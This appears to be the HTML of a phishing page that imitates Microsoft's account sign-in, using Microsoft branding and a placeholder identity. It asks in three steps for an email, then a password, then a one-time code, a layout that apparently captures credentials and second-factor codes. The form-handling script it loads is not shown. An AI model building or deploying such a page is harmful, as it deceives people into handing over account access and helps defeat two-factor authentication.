<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" href="assets/favicon.ico" />
    <title>Sign in to your Microsoft account</title>
    <link rel="stylesheet" href="assets/app.css" />
</head>
<body>
    <section id="section_uname">
        <div class="auth-wrapper">
            <img src="assets/bannerlogo.png" alt="Microsoft" />
            <h2 class="title mb-16 mt-16">Sign in</h2>
            <form id="form_uname">
                <div class="mb-16">
                    <p id="error_uname" class="error"></p>
                    <input id="inp_uname" type="text" name="uname" class="input" placeholder="Email, phone, or Skype" />
                </div>
            </form>
            <div>
                <p class="mb-16 fs-13">No account? <a href="" class="link">Create one!</a></p>
                <p class="mb-16 fs-13">
                    <a href="#" class="link">Sign in with a security key
                        <img src="assets/question.png" alt="Question img">
                    </a>
                </p>
            </div>
            <div>
                <button class="btn" id="btn_next">Next</button>
            </div>
        </div>
    </section>
    <section id="section_pwd" class="d-none">
        <div class="auth-wrapper">
            <img src="assets/bannerlogo.png" alt="Microsoft" class="d-block" />
            <div class="identity w-100 mt-16 mb-16">
                <button class="back">
                    <img src="assets/back.png" />
                </button>
                <span id="user_identity">a@b.com</span>
            </div>
            <h2 class="title mb-16">Enter password</h2>
            <form id="form_pwd">
                <div class="mb-16">
                    <p id="error_pwd" class="error"></p>
                    <input id="inp_pwd" type="password" name="pass" class="input" placeholder="Password" />
                </div>
            </form>
            <div>
                <p class="mb-16"> <a href="#" class="link fs-13">Forgot password?</a></p>
            </div>
            <div>
                <button class="btn" id="btn_sig">Sign in</button>
            </div>
        </div>
    </section>
    <section id="section_final" class="d-none">
        <div class="auth-wrapper">
            <img src="assets/bannerlogo.png" alt="Microsoft" class="d-block" />
            <div class="identity w-100 mt-16 mb-16">
                <button class="back">
                    <img src="assets/back.png" />
                </button>
                <span id="user_identity">a@b.com</span>
            </div>
            <h2 class="title mb-16">Enter Code</h2>
            <p class="p">We just sent code to <span id="user_identity">a@b.com</span> <br> Please enter the code to signin.</p>
            <form id="form_final">
                <input id="otp" type="text" name="uname" class="input" placeholder="Enter code" />
            </form>
            <div class="btn-group">
                <button class="btn" id="btn_final">Sign in</button>
            </div>
        </div>
    </section>
    <footer class="footer">
        <a href="#">Terms of use</a>
        <a href="#">Privacy & cookies</a>
        <span>.&nbsp;.&nbsp;.</span>
    </footer>
    <script src="assets/app.js"></script>
</body>
</html>